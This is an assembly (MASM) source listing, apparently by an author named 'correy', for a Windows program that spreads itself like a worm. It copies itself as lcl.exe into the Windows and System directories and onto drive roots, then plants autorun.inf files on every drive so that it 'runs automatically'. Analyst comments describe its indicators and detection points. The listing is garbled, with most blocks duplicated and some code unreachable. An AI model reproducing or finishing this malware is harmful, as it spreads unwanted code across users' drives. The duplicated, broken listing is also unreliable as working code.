;made by correy
;Email:leguanyuan@126.com
;QQ:112426112
;rc me.rc
;ml /coff test.asm /link /subsystem:windows me.res
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib user32.lib
includelib kernel32.lib
;Email:leguanyuan@126.com
;QQ:112426112
;rc me.rc
;ml /coff test.asm /link /subsystem:windows me.res
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib user32.lib
includelib kernel32.lib
.data
; Initialised string constants used by the program.
; NOTE(review): every definition in this section appears twice in the
; listing. That looks like a page-extraction artefact; as listed, the
; repeated symbol names would be redefinitions - TODO confirm against the
; author's original file.
; Analyst note: "lcl.exe" and "autorun.inf" are the only file names the
; sample writes, so they are its on-disk indicators.
correy db "made by correy",0            ; MessageBox caption; also the bytes written into autorun.inf
lcld db "lcl.exe",0                     ; file name appended to a drive root ("X:\")
lcl db "\lcl.exe",0                     ; same name with a leading backslash, appended to a directory path
autorun db "autorun.inf",0              ; file name appended to the temp path and to each drive root
szFilter DB "*.*",0                     ; not referenced by the code shown on this page
correy db "made by correy",0
lcld db "lcl.exe",0
lcl db "\lcl.exe",0
autorun db "autorun.inf",0
szFilter DB "*.*",0
.data?
; Uninitialised working storage.
; NOTE(review): each variable is declared twice in this listing, which
; looks like a page-extraction artefact - TODO confirm.
; NOTE(review): the path buffers are filled with lstrcpy/lstrcat, which
; take no length argument, so the sizes below are not enforced anywhere
; in the code.
it dd ?                                 ; pointer returned by GetCommandLine (later incremented by one)
buffer DB 256 DUP (?)                   ; own path first, then reused for the drive-string list
buffercopy DB 105 DUP (?)               ; copy of the own path that survives the reuse of buffer
drives dd ?                             ; number of entries counted in the drive-string list
lcli DB 256 DUP (?)                     ; not referenced by the code shown on this page
hfile dd ?                              ; handle returned by CreateFile for the temp autorun.inf
n dd ?                                  ; lstrlen of the command line
windir DB 512 DUP (?)                   ; Windows directory + "\lcl.exe"
sysdir DB 512 DUP (?)                   ; System directory + "\lcl.exe"
tmpdir DB 512 DUP (?)                   ; temp path + "autorun.inf"
az DB 512 DUP (?)                       ; scratch: per-drive destination path
bufferx DB 256 DUP (?)                  ; passed to WriteFile as the bytes-written output
it dd ?
buffer DB 256 DUP (?)
buffercopy DB 105 DUP (?)
drives dd ?
lcli DB 256 DUP (?)
hfile dd ?
n dd ?
windir DB 512 DUP (?)
sysdir DB 512 DUP (?)
tmpdir DB 512 DUP (?)
az DB 512 DUP (?)
bufferx DB 256 DUP (?)
.code
start:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Phase 1 - self-copy into the OS directories.
; Takes the program's own path from the command line, strips the
; surrounding quotes, and copies the file as "lcl.exe" into the Windows
; directory and the System directory.
; NOTE(review): several statement runs in this phase appear twice in the
; listing; this looks like a page-extraction artefact rather than the
; author's code - TODO confirm against the original file.
; Analyst note: the observable result of this phase is a file named
; lcl.exe created in both the Windows and System directories.
;
;Copy itself into the specified folders
invoke GetCommandLine
mov it,eax
;invoke MessageBox,0,it,addr correy,0
;The two quotation marks need to be removed.
; NOTE(review): lstrcpy takes no length limit; buffer is declared as 256 bytes.
invoke lstrcpy,addr buffer,it
;invoke MessageBox,0,addr buffer,addr correy,0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Copy itself into the specified folders
invoke GetCommandLine
mov it,eax
;invoke MessageBox,0,it,addr correy,0
;The two quotation marks need to be removed.
invoke lstrcpy,addr buffer,it
;invoke MessageBox,0,addr buffer,addr correy,0
invoke lstrlen,it
mov n,eax
mov ecx,eax
;Wanted the copy to come out right in one go here; works in theory but not in practice
;sub ecx,2
mov n,eax
mov ecx,eax
;Wanted the copy to come out right in one go here; works in theory but not in practice
;sub ecx,2
; Skip the first character of the command line (the opening quote, per
; the author's note above) and copy ecx = n bytes over buffer.
inc it
mov esi,it
mov edi,offset buffer
; The direction flag is assumed to be clear; the cld is commented out.
;cld
rep movsb
; Write a NUL at buffer + n - 3 to cut off the tail of the string
; (presumably the closing quote and what follows it - verify).
mov eax,offset buffer
add eax,n
sub eax,3;Strange: with 3 it runs correctly but fails under a debugger; with 2 it works under a debugger but fails when run normally.
mov byte ptr [eax],0
;invoke MessageBox,0,addr buffer,addr correy,0
mov esi,it
mov edi,offset buffer
;cld
rep movsb
mov eax,offset buffer
add eax,n
sub eax,3;Strange: with 3 it runs correctly but fails under a debugger; with 2 it works under a debugger but fails when run normally.
mov byte ptr [eax],0
;invoke MessageBox,0,addr buffer,addr correy,0
;Keep a backup copy
; buffercopy lives in .data? and is appended to, not copied into.
; NOTE(review): buffercopy is declared as 105 bytes and lstrcat is
; unbounded, so a longer path would run past the end of it.
invoke lstrcat,addr buffercopy, addr buffer
;invoke MessageBox,0,addr buffercopy,addr correy,0
invoke lstrcat,addr buffercopy, addr buffer
;invoke MessageBox,0,addr buffercopy,addr correy,0
; windir = <Windows directory> + "\lcl.exe"; copy the own file there.
; The last CopyFile argument (bFailIfExists) is 0, so an existing file is
; overwritten. The return value is not checked.
invoke GetWindowsDirectory,addr windir,sizeof windir
invoke lstrcat,addr windir,addr lcl
invoke CopyFile,addr buffer,addr windir,0
invoke lstrcat,addr windir,addr lcl
invoke CopyFile,addr buffer,addr windir,0
; sysdir = <System directory> + "\lcl.exe"; same copy, same flags.
invoke GetSystemDirectory,addr sysdir,sizeof sysdir
invoke lstrcat,addr sysdir,addr lcl
;invoke MessageBox,0,addr sysdir,addr correy,0
invoke CopyFile,addr buffer,addr sysdir,0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Phase 2 - enumerate the logical drives.
; GetLogicalDriveStrings fills buffer with consecutive NUL-terminated
; root strings ("X:\" plus NUL, 4 bytes each) followed by a final NUL.
; The loop walks the list in 4-byte steps until it reads a zero dword
; and leaves the entry count in drives.
; Note that buffer is reused here, so the own path it held is overwritten.
;
;Count the number of drives
invoke GetLogicalDriveStrings,sizeof buffer,addr buffer
mov ebx,offset buffer                   ; ebx = cursor into the drive-string list
xor esi,esi                             ; esi = running count
jmp nextd
; NOTE(review): the statements from here to incdrives follow an
; unconditional jmp and carry no label, so they are unreachable as
; listed; they repeat an earlier run and look like an extraction
; artefact - TODO confirm.
invoke lstrcat,addr sysdir,addr lcl
;invoke MessageBox,0,addr sysdir,addr correy,0
invoke CopyFile,addr buffer,addr sysdir,0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Count the number of drives
invoke GetLogicalDriveStrings,sizeof buffer,addr buffer
mov ebx,offset buffer
xor esi,esi
jmp nextd
incdrives:
inc esi
add ebx,4
inc esi
add ebx,4
nextd:
;invoke MessageBox,0,ebx,ebx,0
cmp dword ptr [ebx],0                   ; a zero dword marks the end of the list
jne incdrives
;invoke MessageBox,0,ebx,ebx,0
cmp dword ptr [ebx],0
jne incdrives
mov drives,esi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Phase 3 - copy the executable to drive roots.
; For each visited entry in the drive-string list, builds "X:\lcl.exe"
; in az and copies the saved own path (buffercopy) to it.
; The GetDriveType / DRIVE_FIXED check is commented out, so no drive-type
; filter is applied to the entries.
; Analyst note: the observable result is a file named lcl.exe at the root
; of the visited volumes; file-creation monitoring on volume roots
; covers this behaviour.
;
;Copy itself to the root directory of every drive.
; edi and esi are used as loop state because stdcall API calls preserve
; them, while ecx and edx may be changed by each call.
mov edi,drives ;neither ecx nor edx works here
; The counter starts at drives - 1, so the loop runs one time fewer than
; the number of entries counted.
sub edi,1;why subtract 1?
mov esi,offset buffer
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Copy itself to the root directory of every drive.
mov edi,drives ;neither ecx nor edx works here
sub edi,1;why subtract 1?
mov esi,offset buffer
addde:
;invoke MessageBox,0,esi,addr correy,0
;invoke MessageBox,0,esi,addr correy,0
;invoke GetDriveType,esi
;cmp eax,DRIVE_FIXED
;jne nextt
;cmp eax,DRIVE_FIXED
;jne nextt
; Copy the 4-byte entry ("X:\" plus its NUL) into az, then append "lcl.exe".
mov eax,[esi]
mov dword ptr az,eax
mov dword ptr az,eax
invoke lstrcat,addr az,addr lcld
;invoke MessageBox,0,addr az,addr correy,0
; bFailIfExists is 0, so an existing file is overwritten; the result is
; not checked.
invoke CopyFile,addr buffercopy,addr az,0
;invoke MessageBox,0,addr az,addr correy,0
invoke CopyFile,addr buffercopy,addr az,0
;nextt:
add esi,4                               ; advance to the next 4-byte drive entry
dec edi
cmp edi,0
jne addde
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Phase 4 - build a template autorun.inf in the temp directory.
; tmpdir = <temp path> + "autorun.inf". The file is created with
; CREATE_ALWAYS (an existing file is replaced), and the bytes written to
; it are the contents of the string correy, sizeof correy bytes long.
; NOTE(review): the handle returned by CreateFile is used without being
; compared against INVALID_HANDLE_VALUE, and the WriteFile result is not
; checked.
; NOTE(review): parts of this phase appear twice in the listing, and a
; copy of the previous loop's tail (add esi,4 ... jne addde) is
; interleaved; this looks like an extraction artefact - TODO confirm.
;
;Create the autorun.inf file in the temp directory.
invoke GetTempPath,sizeof tmpdir,addr tmpdir
invoke lstrcat,addr tmpdir,addr autorun
;invoke MessageBox,0,addr tmpdir,addr correy,0
add esi,4
dec edi
cmp edi,0
jne addde
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Create the autorun.inf file in the temp directory.
invoke GetTempPath,sizeof tmpdir,addr tmpdir
invoke lstrcat,addr tmpdir,addr autorun
;invoke MessageBox,0,addr tmpdir,addr correy,0
; Alternative attribute sets the author tried or considered:
;FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_SYSTEM or FILE_FLAG_WRITE_THROUGH
;FILE_ATTRIBUTE_NORMAL
;FILE_ATTRIBUTE_TEMPORARY or FILE_FLAG_WRITE_THROUGH or FILE_FLAG_DELETE_ON_CLOSE
invoke CreateFile,addr tmpdir,GENERIC_READ or GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hfile,eax
; bufferx receives the number of bytes written.
invoke WriteFile,hfile,addr correy,sizeof correy,addr bufferx,0
;invoke MessageBox,0,addr correy,addr correy,0;this is a debugging statement
invoke FlushFileBuffers,hfile
invoke CloseHandle,hfile
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Create autorun.inf in the root directory of every drive so that it runs automatically.
mov edi,drives ;neither ecx nor edx works here
sub edi,1;why subtract 1?
mov esi,offset buffer
;FILE_ATTRIBUTE_NORMAL
;FILE_ATTRIBUTE_TEMPORARY or FILE_FLAG_WRITE_THROUGH or FILE_FLAG_DELETE_ON_CLOSE
invoke CreateFile,addr tmpdir,GENERIC_READ or GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hfile,eax
invoke WriteFile,hfile,addr correy,sizeof correy,addr bufferx,0
;invoke MessageBox,0,addr correy,addr correy,0;this is a debugging statement
invoke FlushFileBuffers,hfile
invoke CloseHandle,hfile
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Phase 5 - copy the temp autorun.inf to drive roots.
; For each visited entry in the drive-string list, builds
; "X:\autorun.inf" in az, shows that path in a message box, and copies
; the temp file to it. The free-space check (GetDiskFreeSpace) is
; commented out.
; Analyst note: the observable results are an autorun.inf at the root of
; the visited volumes and one message box per visited drive with the
; caption "made by correy". Writes of autorun.inf to volume roots are a
; standard detection point, and the NoDriveTypeAutoRun policy controls
; whether Windows acts on such files.
; NOTE(review): the tail of this phase, including ret and "end start",
; appears twice in the listing - presumably an extraction artefact.
;
;Create autorun.inf in the root directory of every drive so that it runs automatically.
; edi and esi hold the loop state because stdcall API calls preserve them.
mov edi,drives ;neither ecx nor edx works here
; The counter starts at drives - 1, one fewer than the entries counted.
sub edi,1;why subtract 1?
mov esi,offset buffer
addd:
;invoke MessageBox,0,esi,addr correy,0
;invoke MessageBox,0,esi,addr correy,0
;invoke GetDiskFreeSpace,esi,0,0,addr n,0
;cmp n,9
;jb nexttf
;cmp n,9
;jb nexttf
; Copy the 4-byte entry ("X:\" plus its NUL) into az, then append "autorun.inf".
mov eax,[esi]
mov dword ptr az,eax
mov dword ptr az,eax
invoke lstrcat,addr az,addr autorun
; This MessageBox is live (not commented out): it displays the target path.
invoke MessageBox,0,addr az,addr correy,0
; bFailIfExists is 0, so an existing autorun.inf is overwritten; the
; result is not checked.
invoke CopyFile,addr tmpdir,addr az,0
invoke MessageBox,0,addr az,addr correy,0
invoke CopyFile,addr tmpdir,addr az,0
;nexttf:
add esi,4                               ; advance to the next 4-byte drive entry
dec edi
cmp edi,0
jne addd
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Return from the entry point; ExitProcess is not called explicitly.
ret
end start
add esi,4
dec edi
cmp edi,0
jne addd
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ret
end start